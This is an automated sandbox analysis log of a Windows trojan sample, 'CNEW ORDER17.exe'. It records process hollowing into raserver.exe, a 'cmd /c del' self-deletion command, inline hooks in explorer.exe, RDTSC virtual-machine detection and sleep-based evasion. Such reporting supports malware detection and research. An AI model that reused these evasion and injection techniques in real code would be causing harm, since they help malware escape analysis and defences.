          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044E100218_2_044E1002
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0443841F18_2_0443841F
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0443B09018_2_0443B090
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F1D5518_2_044F1D55
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0442F90018_2_0442F900
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04420D2018_2_04420D20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0444412018_2_04444120
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04446E3018_2_04446E30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445EBB018_2_0445EBB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E5D30018_2_02E5D300
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E5E8F318_2_02E5E8F3
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E5E1F918_2_02E5E1F9
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E49E4018_2_02E49E40
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E49E3C18_2_02E49E3C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E42FB018_2_02E42FB0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E42D8718_2_02E42D87
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E42D9018_2_02E42D90
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_0041A060 NtClose,15_2_0041A060
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_0041A110 NtAllocateVirtualMemory,15_2_0041A110
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_00419F30 NtCreateFile,15_2_00419F30
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_00419FE0 NtReadFile,15_2_00419FE0
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_0041A05B NtClose,15_2_0041A05B
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_00419F2A NtCreateFile,15_2_00419F2A
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_00419FDA NtReadFile,15_2_00419FDA
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_00419F84 NtCreateFile,15_2_00419F84
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469840 NtDelayExecution,LdrInitializeThunk,18_2_04469840
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469860 NtQuerySystemInformation,LdrInitializeThunk,18_2_04469860
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469540 NtReadFile,LdrInitializeThunk,18_2_04469540
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469910 NtAdjustPrivilegesToken,LdrInitializeThunk,18_2_04469910
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044695D0 NtClose,LdrInitializeThunk,18_2_044695D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044699A0 NtCreateSection,LdrInitializeThunk,18_2_044699A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469650 NtQueryValueKey,LdrInitializeThunk,18_2_04469650
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469A50 NtCreateFile,LdrInitializeThunk,18_2_04469A50
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469660 NtAllocateVirtualMemory,LdrInitializeThunk,18_2_04469660
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044696D0 NtCreateKey,LdrInitializeThunk,18_2_044696D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044696E0 NtFreeVirtualMemory,LdrInitializeThunk,18_2_044696E0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469710 NtQueryInformationToken,LdrInitializeThunk,18_2_04469710
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469FE0 NtCreateMutant,LdrInitializeThunk,18_2_04469FE0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469780 NtMapViewOfSection,LdrInitializeThunk,18_2_04469780
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0446B040 NtSuspendThread,18_2_0446B040
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469820 NtEnumerateKey,18_2_04469820
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044698F0 NtReadVirtualMemory,18_2_044698F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044698A0 NtWriteVirtualMemory,18_2_044698A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469950 NtQueueApcThread,18_2_04469950
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469560 NtWriteFile,18_2_04469560
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469520 NtWaitForSingleObject,18_2_04469520
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0446AD30 NtSetContextThread,18_2_0446AD30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044699D0 NtCreateProcessEx,18_2_044699D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044695F0 NtQueryInformationFile,18_2_044695F0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469670 NtQueryInformationProcess,18_2_04469670
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469A00 NtProtectVirtualMemory,18_2_04469A00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469610 NtEnumerateValueKey,18_2_04469610
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469A10 NtQuerySection,18_2_04469A10
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469A20 NtResumeThread,18_2_04469A20
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469A80 NtOpenDirectoryObject,18_2_04469A80
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469760 NtOpenProcess,18_2_04469760
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469770 NtSetInformationFile,18_2_04469770
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0446A770 NtOpenThread,18_2_0446A770
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469B00 NtSetValueKey,18_2_04469B00
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0446A710 NtOpenProcessToken,18_2_0446A710
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04469730 NtQueryVirtualMemory,18_2_04469730
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044697A0 NtUnmapViewOfSection,18_2_044697A0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0446A3B0 NtGetContextThread,18_2_0446A3B0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E5A060 NtClose,18_2_02E5A060
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E5A110 NtAllocateVirtualMemory,18_2_02E5A110
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E59FE0 NtReadFile,18_2_02E59FE0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E59F30 NtCreateFile,18_2_02E59F30
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E5A05B NtClose,18_2_02E5A05B
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E59FDA NtReadFile,18_2_02E59FDA
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E59F84 NtCreateFile,18_2_02E59F84
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E59F2A NtCreateFile,18_2_02E59F2A
          Source: CNEW ORDER17.exe, 00000000.00000000.296992741.000000000026A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameConsoleApp17.exeB vs CNEW ORDER17.exe
          Source: CNEW ORDER17.exe, 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamePlyqntsieflxwczqxdgrrbh.dll" vs CNEW ORDER17.exe
          Source: CNEW ORDER17.exe, 0000000F.00000002.520200234.000000000125F000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs CNEW ORDER17.exe
          Source: CNEW ORDER17.exe, 0000000F.00000003.518794069.0000000000BBF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameraserver.exej% vs CNEW ORDER17.exe
          Source: CNEW ORDER17.exe, 0000000F.00000000.421473120.000000000059A000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameConsoleApp17.exeB vs CNEW ORDER17.exe
          Source: CNEW ORDER17.exeBinary or memory string: OriginalFilenameConsoleApp17.exeB vs CNEW ORDER17.exe
          Source: CNEW ORDER17.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: CNEW ORDER17.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: CNEW ORDER17.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: CNEW ORDER17.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: CNEW ORDER17.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: CNEW ORDER17.exe.0.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: CNEW ORDER17.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: CNEW ORDER17.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeFile read: C:\Users\user\Desktop\CNEW ORDER17.exeJump to behavior
          Source: CNEW ORDER17.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: unknownProcess created: C:\Users\user\Desktop\CNEW ORDER17.exe 'C:\Users\user\Desktop\CNEW ORDER17.exe'
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess created: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe'
          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess created: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeProcess created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exeJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe'Jump to behavior
          Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6C3EE638-B588-4D7D-B30A-E7E36759305D}\InprocServer32Jump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CNEW ORDER17.exe.logJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeFile created: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeJump to behavior
          Source: classification engineClassification label: mal100.troj.evad.winEXE@8/3@0/0
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6628:120:WilError_01
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
          Source: CNEW ORDER17.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
          Source: CNEW ORDER17.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: CNEW ORDER17.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: wntdll.pdbUGP source: CNEW ORDER17.exe, 0000000F.00000002.519709359.0000000000FB0000.00000040.00000001.sdmp, raserver.exe, 00000012.00000002.571207765.000000000451F000.00000040.00000001.sdmp
          Source: Binary string: RAServer.pdb source: CNEW ORDER17.exe, 0000000F.00000002.521099012.0000000003030000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdb source: CNEW ORDER17.exe, 0000000F.00000002.519709359.0000000000FB0000.00000040.00000001.sdmp, raserver.exe
          Source: Binary string: RAServer.pdbGCTL source: CNEW ORDER17.exe, 0000000F.00000002.521099012.0000000003030000.00000040.00020000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_0041D0D2 push eax; ret 15_2_0041D0D8
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_0041D0DB push eax; ret 15_2_0041D142
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_0041D085 push eax; ret 15_2_0041D0D8
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_0041D13C push eax; ret 15_2_0041D142
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_00417C84 pushfd ; ret 15_2_00417C8E
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0447D0D1 push ecx; ret 18_2_0447D0E4
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E5D0D2 push eax; ret 18_2_02E5D0D8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E5D0DB push eax; ret 18_2_02E5D142
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E5D085 push eax; ret 18_2_02E5D0D8
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E5D13C push eax; ret 18_2_02E5D142
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_02E57C84 pushfd ; ret 18_2_02E57C8E
          Source: CNEW ORDER17.exeStatic PE information: 0xE32C5996 [Tue Oct 10 16:02:30 2090 UTC]
          Source: initial sampleStatic PE information: section name: .text entropy: 7.99906118019
          Source: initial sampleStatic PE information: section name: .text entropy: 7.99906118019
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeFile created: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x89 0x9E 0xEA
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: /c del 'C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe'
          Source: C:\Windows\SysWOW64\raserver.exeProcess created: /c del 'C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe'Jump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion:

          barindex
          Tries to detect virtualization through RDTSC time measurementsShow sources
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeRDTSC instruction interceptor: First address: 00000000004098E4 second address: 00000000004098EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeRDTSC instruction interceptor: First address: 0000000000409B5E second address: 0000000000409B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000002E498E4 second address: 0000000002E498EA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\raserver.exeRDTSC instruction interceptor: First address: 0000000002E49B5E second address: 0000000002E49B64 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\CNEW ORDER17.exe TID: 4348Thread sleep count: 1054 > 30Jump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exe TID: 4348Thread sleep count: 34 > 30Jump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exe TID: 4348Thread sleep time: -34000s >= -30000sJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exe TID: 2244Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_00409A90 rdtsc 15_2_00409A90
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeWindow / User API: threadDelayed 1054Jump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000010.00000000.455691375.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000010.00000000.455828193.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000010.00000000.470059747.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000010.00000000.455691375.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000010.00000000.470059747.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: explorer.exe, 00000010.00000000.455691375.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeCode function: 15_2_00409A90 rdtsc 15_2_00409A90
          Source: C:\Users\user\Desktop\CNEW ORDER17.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04440050 mov eax, dword ptr fs:[00000030h]18_2_04440050
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04440050 mov eax, dword ptr fs:[00000030h]18_2_04440050
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044BC450 mov eax, dword ptr fs:[00000030h]18_2_044BC450
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044BC450 mov eax, dword ptr fs:[00000030h]18_2_044BC450
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0444746D mov eax, dword ptr fs:[00000030h]18_2_0444746D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F1074 mov eax, dword ptr fs:[00000030h]18_2_044F1074
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044E2073 mov eax, dword ptr fs:[00000030h]18_2_044E2073
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044A6C0A mov eax, dword ptr fs:[00000030h]18_2_044A6C0A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044A6C0A mov eax, dword ptr fs:[00000030h]18_2_044A6C0A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044A6C0A mov eax, dword ptr fs:[00000030h]18_2_044A6C0A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044A6C0A mov eax, dword ptr fs:[00000030h]18_2_044A6C0A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F740D mov eax, dword ptr fs:[00000030h]18_2_044F740D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F740D mov eax, dword ptr fs:[00000030h]18_2_044F740D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F740D mov eax, dword ptr fs:[00000030h]18_2_044F740D
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044E1C06 mov eax, dword ptr fs:[00000030h]18_2_044E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044E1C06 mov eax, dword ptr fs:[00000030h]18_2_044E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044E1C06 mov eax, dword ptr fs:[00000030h]18_2_044E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044E1C06 mov eax, dword ptr fs:[00000030h]18_2_044E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044E1C06 mov eax, dword ptr fs:[00000030h]18_2_044E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044E1C06 mov eax, dword ptr fs:[00000030h]18_2_044E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044E1C06 mov eax, dword ptr fs:[00000030h]18_2_044E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044E1C06 mov eax, dword ptr fs:[00000030h]18_2_044E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044E1C06 mov eax, dword ptr fs:[00000030h]18_2_044E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044E1C06 mov eax, dword ptr fs:[00000030h]18_2_044E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044E1C06 mov eax, dword ptr fs:[00000030h]18_2_044E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044E1C06 mov eax, dword ptr fs:[00000030h]18_2_044E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044E1C06 mov eax, dword ptr fs:[00000030h]18_2_044E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044E1C06 mov eax, dword ptr fs:[00000030h]18_2_044E1C06
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F4015 mov eax, dword ptr fs:[00000030h]18_2_044F4015
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F4015 mov eax, dword ptr fs:[00000030h]18_2_044F4015
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044A7016 mov eax, dword ptr fs:[00000030h]18_2_044A7016
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044A7016 mov eax, dword ptr fs:[00000030h]18_2_044A7016
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044A7016 mov eax, dword ptr fs:[00000030h]18_2_044A7016
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0443B02A mov eax, dword ptr fs:[00000030h]18_2_0443B02A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0443B02A mov eax, dword ptr fs:[00000030h]18_2_0443B02A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0443B02A mov eax, dword ptr fs:[00000030h]18_2_0443B02A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0443B02A mov eax, dword ptr fs:[00000030h]18_2_0443B02A
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_0445BC2C mov eax, dword ptr fs:[00000030h]18_2_0445BC2C
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044F8CD6 mov eax, dword ptr fs:[00000030h]18_2_044F8CD6
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044BB8D0 mov eax, dword ptr fs:[00000030h]18_2_044BB8D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044BB8D0 mov ecx, dword ptr fs:[00000030h]18_2_044BB8D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044BB8D0 mov eax, dword ptr fs:[00000030h]18_2_044BB8D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044BB8D0 mov eax, dword ptr fs:[00000030h]18_2_044BB8D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044BB8D0 mov eax, dword ptr fs:[00000030h]18_2_044BB8D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044BB8D0 mov eax, dword ptr fs:[00000030h]18_2_044BB8D0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044E14FB mov eax, dword ptr fs:[00000030h]18_2_044E14FB
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044A6CF0 mov eax, dword ptr fs:[00000030h]18_2_044A6CF0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044A6CF0 mov eax, dword ptr fs:[00000030h]18_2_044A6CF0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_044A6CF0 mov eax, dword ptr fs:[00000030h]18_2_044A6CF0
          Source: C:\Windows\SysWOW64\raserver.exeCode function: 18_2_04429080 mov eax, dword ptr fs:[00000030h]18_2_04429080
